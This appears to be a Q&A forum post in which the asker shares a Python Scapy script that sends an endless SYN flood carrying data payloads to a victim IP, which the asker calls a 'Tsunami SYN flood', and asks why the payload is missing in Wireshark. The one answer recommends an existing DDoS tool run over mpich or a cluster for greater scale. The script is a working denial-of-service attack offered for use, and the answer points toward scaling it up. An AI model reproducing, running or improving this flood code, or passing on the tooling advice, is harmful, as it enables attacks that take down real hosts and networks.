# When making a packet with Scapy I can't see my payload in Wireshark

Tags: python, tcp, scapy, ddos

I'm writing a small bit of code to create a Tsunami SYN flood packet for a project I'm working on.
The Tsunami SYN flood differs from a normal SYN flood in that the packet holds data, this means that link bandwidth is exhausted as well as resources on the victim machine.

I think I've successfully added a data payload to my packet, it shows up when I run the code, but when I look at the packets on Wireshark I can't seem to see the data. I'm most likely missing something very obvious but some help would be appreciated, it's all a bit new to me.

```
#type sudo, command then follow with victim IP address
import sys
from scapy.all import *
iterationCount = 0
f=IP(dst=sys.argv[1], ttl=50)
t=TCP(sport=RandShort(),dport=[80], window=1000, flags="S")
payload="Here is my payload I want it to be longer than this but this is just for testing purposes"
packet=f/t/payload
print "Flood packet info"
packet.show()
print "sending packets"
while (1 == 1):
    send(packet, verbose=0) #sends packet and supresses 1 packet sent message
    iterationCount = iterationCount + 1
    print(str(iterationCount) + " Packets Sent")
```

Answer (score 0):

Why reinvent the wheel?
Use tfnk2 (has option for packet size)
Use mpich to run tfnk2
Or
Build a cluster and run tfnk2